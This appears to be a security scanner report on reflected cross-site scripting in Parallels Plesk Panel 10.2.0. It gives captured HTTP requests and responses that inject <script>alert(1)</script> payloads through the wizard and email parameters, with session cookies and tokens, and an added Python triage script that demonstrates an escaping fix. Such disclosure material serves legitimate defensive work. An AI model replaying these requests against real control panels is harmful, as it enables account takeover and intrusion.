User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary08k3wexWDUqjogvg
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 21605

------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="text"

inject
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="place"

domain
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="sort_key"

100
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="fname"; filename="160x160.jpg"
Content-Type: image/jpeg

......JFIF.....`.`......Exif..MM.*.............?...z.;.....G.....i.................~...........~...j...........X.......~...............n............................$.......K.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .B.o.s.t.o.n.,. .M.A. 
.h.t.t.p.:././.h.o.y.t...n.e.t.;.h.0.2.3.3.2.;.H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...Hoyt LLC Research, Boston, MA http://hoyt.net;h02332;Hoyt LLC Research..h.0.2.3.3.2.;.H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...h02332;Hoyt LLC Research..XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86..Hoyt LLC Research........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
.........................................................................................................................................................................................................................................................................................................................................................................................................X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6...X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6...H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h...X.S.S.,. .C.r.o.s.s. .S.i.t.e. .S.c.r.i.p.t.i.n.g.,. .H.o.y.t. .L.L.C. .R.e.s.e.a.r.c.h.,. .C.W.E.-.7.9.,. .C.A.P.E.C.-.8.6.......http://ns.adobe.com/xap/1.0/.<?xpacket begin='...' id='W5M0MpCehiHzreSzNTczkc9d'?>
<x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:creator><rdf:Seq xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>Hoyt LLC Research, Boston, MA http://hoyt.net</rdf:li><rdf:li>h02332</rdf:li><rdf:li>Hoyt LLC Research</rdf:li></rdf:Seq>
           </dc:creator></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:MicrosoftPhoto="http://ns.microsoft.com/photo/1.0/"/><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:subject><rdf:Bag xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Bag>
           </dc:subject><dc:title><rdf:Alt xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Alt>
           </dc:title><dc:description><rdf:Alt xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Alt>
           </dc:description></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:MicrosoftPhoto="http://ns.microsoft.com/photo/1.0/"><MicrosoftPhoto:LastKeywordXMP><rdf:Bag xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>XSS, Cross Site Scripting, Hoyt LLC Research, CWE-79, CAPEC-86</rdf:li></rdf:Bag>
           </MicrosoftPhoto:LastKeywordXMP></rdf:Description></rdf:RDF></x:xmpmeta>

<?xpacket end='w'?>
[remainder of the JPEG binary in this multipart part omitted; not reproducible as text]
....jG.o...............n!?.~`r@.}Eu.P.#....h.q...Gm.A..m.fu,9......U.=...k.#R..b..&.L..<Wr.:.....-..]....|..z(.......=a..OG.6"..\.M#..L..)P.\3}..@..<G.M".E....&i..(.
.wGpY..>...;.]E..........*..<.
:{.N..N....X..F.:.0.=    ......k..T...Be.K.}..
L..?$......w*3....>...D...m...X4.`..",.......^+..U.=....v!c..@    ..
........o.gi.............v.Vv...!K......IZ../.T....E.._#..B.......s...E.q..p........(.I........G..%u+.......4.mK.....4.T.....h..yr..f.@.t.q.q...W...uO..6.<i#".2...0b    <...x...Rk.....i....0=...@`D.\.p9....#...VS.;..9.H.+....Y>..XX.......2.A*..3.8.U...'....f....,p...ct..r.....g......g...w.z..x..m....n....8..Ejg....3.3.....G..q....K/&. .^    .)!s")..3.0..q.7t.<......m..U.........q. ....c..:ZZkB^.    ../..zu..#...|!e].....+....IR..i"..b...-/J...d[46...-(.20B..M.q..N+.h.h.S......_Ma...B....x.s..b.aA..m.89.O...n.y...L.<...{.g-..>V=.?/..9..wTP...<....K..} =.ww..>.-.Q/.|..&:..\.(.}....s{...].......,4,]n.K...x!y..=k.h.h...<C`&..7:]...%...........7.B..BA#9.W.aiws,...ys....h[.c........vTP.C...c........N4...j<.y.s...'.L.4.:.|c,...M.......$...%.2c...$..pMv..V.RB.....?..I.c.ys....@t...v.Vv...!K......IZ:.o.gi.............2.eO....o._..?.)*......G/......|.g.z}..n.s.?..Z....E.._#..B.........6...z....t..C.LY....l[...a...\...!w...!.Y d.6.J..c...-.......'_.........v....Y'....@.y...Y.T...t.Fk.D...:.4.f..ql.$o..F..9$...;Q.A..    ...)2..wi.U?.....r{V....P.W..Z5+0*|...+.s..=).o...3..K.B9PYs...hKD.99I...y..km..:..Qoosqu$....L_....M..)4eq.[...f.ZgS...q..8.+.m........C        .N......j.=p=).Z>.|....ip. ..X..|m.A.p...R..M^.M?E...1$...J......\....o.^.,..K......c$....!-.l..rO$
.l..-:....pZ...\...OS.1...F.,.    i..@.O4..U.......=i...os...^.q<.]..4. 2H.]C..|...d.....j...c.....G.....[<.1.I.    .5`F:.0q.u?.:v.o.Z..h..+.1..x.I$.....i..C....1@..H.U......    ..=M4....gO..?..\O.<..j7V.....$~n..]..v;...z...{..3S.K...K....)g...}.paU.....d...z
.Z..m.+....#.k.w0.'sd.......4O3...#L.JV..p.{w...z.@...>$.......\y.7).k/.U.....&N.>o_\VL.....u.j..;[...D.H.b..    #z.....r8..]....5...W.>7E*.F...<u...- ..V..!.....b.eG..p=....G.Eyuuz....{.]!...6.....W .H9.,}......6.-..._..]...q.._...aF~_1.9.)......t.......,q.%r..2........Q"./...|..4.$DTyXm26.K`.............;}+;H.......\`......C.......j_....
J...}......7./........*..[...) [...t$...N.^.NjO....o._..?.)+.[[o.Y...y.$.].wV.z.M&..;6..i..."g6...1R.0.'.#.9.c...G{..]o.{=9..gS..f..e.#.... .Mt.....+i/t..hl..w..........t..GQ..OCz2.......u....[.v.I..k{F....la....>..9.]Z.{mOF.....m....Q...zr...ZP..    ....F.V.........:.....qysi5..X...X....V.a.jQVI.I.....S.....v.}..qc.........Z0?.#q...F._.M.5.k.B$...K8...............;z.....f.{{...H]..F....Q...y[z......]
..He.f.Tw....d.....s..........w".7'.$.:3...........j.,.....r|./....j&.m.....q....N..J..;........U.Z0h....jQ.7..g......`c=c..Vo^,.V...e......M.. 0.`.9...V..cK.[..    ...Sgoy......@.*.y..3.=..._x.4..X.y..\.}..m...`..:...3.'........)i... ....f...
|..S............u.<...2....%3"a...h9Q.P%........H...5.wry..D$....!..n    Q......Oy.4....;....YvC2....#$..@..?......X........S..t..@...F[.R..<..P.V.)d2I<.....#........ex.'.<........m|...f.E.......|....]oGY.b....6r1..'<hX......{x....h.X.2.....*..a....~.....oo../.y...........s.NO=1v=2;.....z.W.x.S...Q......t....j........_.G .m#+,.n>s..G.26m.....t....uh..i..H.;.....h*.FO....v....H......e.[k.{Y..*....r.u+.......X\._j.J..S:.V)....F..........{+.j......CR...0.RV....Y.G..5/.....%i...eO....o._..?.)*.x.O.W..<..0......n%.v<......o._..?.)*.xoO.W.i<.....3f......<R...........fKi....Z'....../.f..G.-dh...c).......z~.+f.....mm.........U5...D.I..=...w0...."..q..%.m....-X.+..x|.I.ZIr..+....'.9..w..4....bZ...[....VY|...O..8.H...@.5r.$....v..Uw...c...........[L3.mn.....
...z....#..1q...{$MI'6..... ....;.1b.$....9...w....R8......I..t.l..4.oq=.[6%-..4.......A..NiA....t.Am....nm+%.Le6..)....&3..I."...fm.,.t.^..p.    p..Jah.F..%.. ......'_,....+.F.Y.......Y1..JkY'..U..Lmk*.......l........Z^.............gU.`..&z...Tg......h...l.Y`.'...##.}..C.........x.M.....#.9"5.    $rFwe.K.`.#........W.........d2...UUA-.s.z.VtZ..dm.-..k..&X...!..s...v.Q...=).xR..{K.i.{..(..w..e-.0..X68..q.".:...K.{%....i..V........    ....`z.    .&.k.V......"u....^Gc...{.
.y..Dc..    ..`.....B......\.0r}..k..S.H..6.;.x..;..Z....K6..:.q.GK....t.'.#.....$
fU,.)h..    
H.i...9..'.m..e....,W..bg.HI...2.L.$m.......|.s....\D....{p..L..#......yj.]..|@....a...w..>.a+....s.A=1.=-....4$.&....fYZ).,k.....we.K.`.#...d.4.....)...n.uR.D.....;[.zV<:&........]E-.1.3......pRw./.......>....n,4.,.K.*;....2...`.. ....w.4.......J..?.!...?.)+GP....#.B...q...B....?l.........G..%t"...VKs<^q...x...N..x?.C~".......IQ..[......"....Y.@E...lV..b.I.wa...v@...    vn.|..*.N.    =:{s.I..........3........8....P..........;......{..s.......N.{v.....$..}....%`y.<.....Mws....3...B..'.{.O.V\#...8...=.A..3_.....VM.{..I,.....C.@e.-..........!>}b.Q~^.GV*-z........I%?..!..y.2HD..22q...*.x.J.+W.\K..g.m.f..R.eQI\.....+.X'......(..ym....gr.....l....$0S.Ppil..N.U....,U`.?j..8.@..T...U.e... .9..-Y...j..2..y..+....d.......9..<..^]..p.;...e..>B......b..h......-.......1.i].bJ...n.c.`U{...]wH..Y$.k.....-.. eo@...r.........Z...}.....<r!.$........1...9..2M:..z~.v...zeF...'.P.v...S..    .=k....og.Z.}...n.....R.`...y...........j:.....|.2.@u.b... .....].m.Y......[3$.Q...F1..u..<.    ....b.<l........C.q\....x.m..67..w;.;U.. ......\...]6.f.6.......m6K...c.yH..wv...=A..v=#....kM0..)yI..0..>:...`dd..#.W.......ZF...-".......!...F.c..9..j.C"[Zjwv......;]YDd...].<A. ..$...c.O....W....-.....h...U![9..X...{pj.....K-....H..9g`.8.$
...8....4......p.[.%.....G.]..s....'..4.,W.tU6.K).0....Y.......8,..;P..3.u..J..?.!...?.)+GP....#.B...q...B...._l.........G..%u+.......4.m\.....7./......V.H?.#...i.O.>O3.=>...v9........>k$w9.2...>Z.y...c..Q..G..L..S..f.....8..u..U['d.P..r.q.<q.....9./...E.$.z;Z..N.Q.M./..)+@.$..7d...S...\.a....F,K.T...=1.}hx...O....K.....v....q).......@..b."..m".ZZ...\ua...s........^8.4.o....I.$...H.....,Y.....WM_Y...Z+..2=...}..X.B...|....n9+.{FV;....5-j........-b..KH.;w.KM..xB.`!..u....G}.k.m$.....E.2/.z6._.#......v`...h..][X....j.Z.k..G.1.........P.......T.jz..NnE..$7P......$XwHI\..c.N=A.u.....h....%...n&....j    ..+...w..q....;........L.]....VM.H...(lg#y..'.K.....C.ik.......c..4.j."...+/.dl8...    #..8..K...^./.u.;..\M.fD..veWh........h....\F..;.;X{i'..;..]3"....lU...1._......P.....y?../.1    ...|)%NB...u.l..._.ms..
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="url"


------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_1"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_32"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_512"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_1024"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_2"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_4"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_8"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="inc_bit_16"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="conhelp"

will it take xss?
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="private"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="cb_id"

0
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="cmd"

update
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizstep"

1
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizard"

/plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323
------WebKitFormBoundary08k3wexWDUqjogvg
Content-Disposition: form-data; name="wizaction"

finish
------WebKitFormBoundary08k3wexWDUqjogvg--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:06 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:05 GMT
Connection: close
Content-Length: 907

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/custom-buttons/custom-button@new/properties/f20a2<script>alert(1)</script>641f862f323')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: Abstract.php:95
   Form_Abstract->Form()
4: class.CustomButton.php:473
   CustomButtonEditForm->CustomButtonEditForm(integer '4')
5: CustomButtonPropertiesUIPointer.php:90
   CustomButtonPropertiesUIPointer->accessItem(string 'POST', NULL null)
6: UIPointer.php:600
   UIPointer->access(string 'POST')
7: plesk.php:47

2.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@new/properties/ [wizard parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@new/properties/

Issue detail

The value of the wizard request parameter is copied into the response body as plain text between tags. The payload 9529a<script>alert(1)</script>dec0102c10a2a2f60 was submitted in the wizard parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. Two points from the captured response below qualify the finding: the value is reflected inside the unhandled PleskBadURIException error page, which also leaks a PHP stack trace (UIPointer::parse, wizard_get, CustomButtonEditForm), and that page is served as Content-Type: text/plain with no X-Content-Type-Options: nosniff header, so the unencoded reflection is certain while actual script execution depends on whether the client sniffs the plain-text body as HTML.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver. Note that the converted request still carries the session's forgery_protection_token, so cross-site delivery also depends on whether the endpoint accepts the request without a valid token, which is not shown here.

Request

GET /plesk/client@2/custom-buttons/custom-button@new/properties/?text=XSS+Link+to+store.parallels.com+with+XSS&place=domain&sort_key=100&fname=%0d&url=http%3a%2f%2fstore.parallels.com%2fstore%3fAction%3dDisplayPage%26Locale%3den_US%26SiteID%3dpara%26id%3dThreePgCheckoutShoppingCartPage%264cff6--%3e%3cscript%3ealert%281%29%3c%2fscript%3e2ce5d8d75e9%3d1&conhelp=%2fstore%3fAction%3dDisplayPage%26Locale%3den_US%26SiteID%3dpara%26id%3dThreePgCheckoutShoppingCartPage%264cff6--%3e%3cscript%3ealert%281%29%3c%2fscript%3e2ce5d8d75e9%3d1&private=true&cb_id=0&forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizstep=1&wizard=%2fplesk%2fclient@2%2fcustom-buttons%2fcustom-button@new%2fproperties%2f9529a%3cscript%3ealert%281%29%3c%2fscript%3edec0102c10a2a2f60&wizaction=finish HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/custom-button@new/properties/
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/plain; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:15:05 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:15:05 GMT
Connection: close
Content-Length: 923

ERROR: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60

Additionally, an exception has occurred while trying to report this error: PleskBadURIException
Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60

0: UIPointer.php:49
   UIPointer::parse(string '/plesk/client@2/custom-buttons/custom-button@new/properties/9529a<script>alert(1)</script>dec0102c10a2a2f60')
1: common_func.php3:3913
   wizard_get()
2: Abstract.php:81
   Form_Abstract->__construct()
3: Abstract.php:95
   Form_Abstract->Form()
4: class.CustomButton.php:473
   CustomButtonEditForm->CustomButtonEditForm(integer '4')
5: CustomButtonPropertiesUIPointer.php:90
   CustomButtonPropertiesUIPointer->accessItem(string 'GET', NULL null)
6: UIPointer.php:600
   UIPointer->access(string 'GET')
7: plesk.php:47

2.3. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/create/ [email parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/create/

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute that is enclosed in double quotation marks. The payload a42c4"><script>alert(1)</script>e3e36e04876dbfe97 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The leading " closes the value attribute and the > closes the input tag, so the script element that follows is parsed as markup; unlike the wizard parameter finding, this response is served as Content-Type: text/html, so the injected script runs in any browser that renders the page.

The original request used the POST method; however, it was possible to convert it to a GET request, which makes the attack easier to demonstrate and deliver. The captured response also displays an information message stating that a backup of the domain was scheduled, next to the validation error for the email field; when assessing the impact of the token-bearing GET request, check whether the request itself triggered that state change.
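The triage behind the "Issue detail" text for both the wizard parameter (2.2) and the email parameter (2.3), as an added example that is not part of the XSS.CX report and not Plesk code: it locates the canary in a raw HTTP response, classifies the context it lands in (plain text versus a double-quoted attribute), and uses the Content-Type and X-Content-Type-Options headers to separate a confirmed reflection from a reflection a browser will actually execute. RESPONSE_2_2 and RESPONSE_2_3 are constructed, abridged versions of the two captured responses; the canary strings are the report's own; render_email_input() is a hypothetical hardened rendering of the email field, not the panel's own template.

```python
"""Reflected-XSS triage for findings 2.2 and 2.3 (added example, not report or Plesk code)."""
import html

CANARY_2_2 = "9529a<script>alert(1)</script>dec0102c10a2a2f60"
CANARY_2_3 = 'a42c4"><script>alert(1)</script>e3e36e04876dbfe97'

# Constructed sample: the text/plain error page of finding 2.2, abridged.
RESPONSE_2_2 = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "\r\n"
    "ERROR: PleskBadURIException\n"
    "Invalid URI: /plesk/client@2/custom-buttons/custom-button@new/properties/"
    + CANARY_2_2 + "\n"
)

# Constructed sample: the text/html backup form of finding 2.3, abridged.
RESPONSE_2_3 = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    '<input type="text" name="email" id="fid-email" value="'
    + CANARY_2_3 + '" size="30" maxlength="254">\n'
)


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def reflection_context(body, canary):
    """Where the canary lands: 'none', 'encoded', 'text', 'tag' or 'attribute'.

    'attribute' means the canary sits inside a quoted attribute value (an odd
    number of double quotes since the tag opened), as in finding 2.3; 'text'
    means it sits between tags or in a non-HTML body, as in finding 2.2.
    """
    idx = body.find(canary)
    if idx < 0:
        return "encoded" if html.escape(canary, quote=True) in body else "none"
    tag_open = body.rfind("<", 0, idx)
    tag_close = body.rfind(">", 0, idx)
    if tag_open > tag_close:          # still inside the most recently opened tag
        quotes = body.count('"', tag_open, idx)
        return "attribute" if quotes % 2 == 1 else "tag"
    return "text"


def script_can_execute(headers):
    """'yes' for HTML bodies; 'sniff-dependent' for text/plain without
    X-Content-Type-Options: nosniff (legacy clients may sniff it as HTML);
    otherwise 'no'."""
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    if ctype in ("text/html", "application/xhtml+xml"):
        return "yes"
    if ctype == "text/plain" and not nosniff:
        return "sniff-dependent"
    return "no"


def assess(raw, canary):
    """Triage one captured response for an unencoded reflection of canary."""
    _, headers, body = split_response(raw)
    ctx = reflection_context(body, canary)
    reflected = ctx in ("text", "tag", "attribute")
    return {
        "context": ctx,
        "reflected_raw": reflected,
        "executes": script_can_execute(headers) if reflected else "no",
    }


def render_email_input(value):
    """Hypothetical hardened rendering of the 2.3 field: HTML-escape the value
    (double quotes included) before placing it inside a quoted attribute."""
    return ('<input type="text" name="email" id="fid-email" value="%s" size="30">'
            % html.escape(value, quote=True))


if __name__ == "__main__":
    print("2.2:", assess(RESPONSE_2_2, CANARY_2_2))
    print("2.3:", assess(RESPONSE_2_3, CANARY_2_3))
    print("fixed 2.3 context:",
          reflection_context(render_email_input(CANARY_2_3), CANARY_2_3))
```

Run against the two samples, finding 2.2 classifies as a raw reflection in text context whose execution is sniff-dependent, and finding 2.3 as an attribute-context reflection in an HTML body that executes outright; the escaped rendering of the email field turns the same payload into an inert, encoded reflection.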

Request

GET /plesk/client@2/domain@1/backup/create/?forgery_protection_token=48333f77aef379c04c82252b59636182&cmd=update&lock=true&previous_page=%0d&wizaction=%0d&prefix=bak&comment=Domain++backup.%0d%0aCreation+date%3a+May+23%2c+2011+02%3a39+PM&split_backup=false&repository=local&email=%0da42c4%22%3e%3cscript%3ealert%281%29%3c%2fscript%3ee3e36e04876dbfe97&content=configuration_and_content&content_type=backup_content_all_at_domain&suspend=false HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/create/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:41:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:41:46 GMT
Connection: close
Content-Length: 17961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
